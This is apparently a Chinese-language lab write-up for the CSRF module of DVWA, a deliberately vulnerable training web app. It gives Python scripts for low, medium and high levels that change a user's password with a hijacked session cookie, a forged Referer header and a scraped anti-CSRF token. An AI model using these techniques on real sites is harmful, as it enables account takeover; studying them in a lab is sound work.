low
设置一下cookie的PHPSESSID和security即可跨站请求
import requests
def main():
url = 'http://192.168.67.22/dvwa/vulnerabilities/csrf/index.php'
headers = {
'Cookie': 'PHPSESSID=88airjn39jqo5mi25fnngko6f0; security=low',
}
new_password = 'ac'
url = '%s?password_new=%s&password_conf=%s&Change=Change' % (url, new_password, new_password)
res = requests.get(url, headers=headers)
if 'Password Changed.' in res.content:
print('Yes')
else:
print('No')
if __name__ == '__main__':
main()
medium
查看源码,发现
// Checks to see where the request came from
if( eregi( $_SERVER[ 'SERVER_NAME' ], $_SERVER[ 'HTTP_REFERER' ] ) )
根据Referer验证请求来源,绕过思路:在HTTP请求头声明Referer。
import requests
def main():
url = 'http://192.168.67.22/dvwa/vulnerabilities/csrf/index.php'
headers = {
'Cookie': 'PHPSESSID=88airjn39jqo5mi25fnngko6f0; security=medium',
'Referer': 'http://192.168.67.22/dvwa/vulnerabilities/csrf/'
}
new_password = 'ac'
url = '%s?password_new=%s&password_conf=%s&Change=Change' % (url, new_password, new_password)
res = requests.get(url, headers=headers)
if 'Password Changed.' in res.content:
print('Yes')
else:
print('No')
if __name__ == '__main__':
main()
high
查看源码,发现多了动态user_token验证
// Check Anti-CSRF token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
绕过思路:在代码层面发跨站请求动态获取user_token,再发跨站请求修改密码。
import requests
import re
def main():
url = 'http://192.168.67.22/dvwa/vulnerabilities/csrf/index.php'
headers = {
'Cookie': 'PHPSESSID=88airjn39jqo5mi25fnngko6f0; security=high',
'Referer': 'http://192.168.67.22/dvwa/vulnerabilities/csrf/'
}
res = requests.get(url, headers=headers)
m = re.search(r"user_token' value='(.*?)'", res.content, re.M | re.S)
if m:
user_token = m.group(1)
new_password = 'ac'
url = '%s?password_new=%s&password_conf=%s&user_token=%s&Change=Change' % (url, new_password, new_password, user_token)
res = requests.get(url, headers=headers)
if 'Password Changed.' in res.content:
print('Yes')
else:
print('No')
print(res.content)
if __name__ == '__main__':
main()
注:这3个实验要跨站,别一直都在本地同一个浏览器测试,这没意思。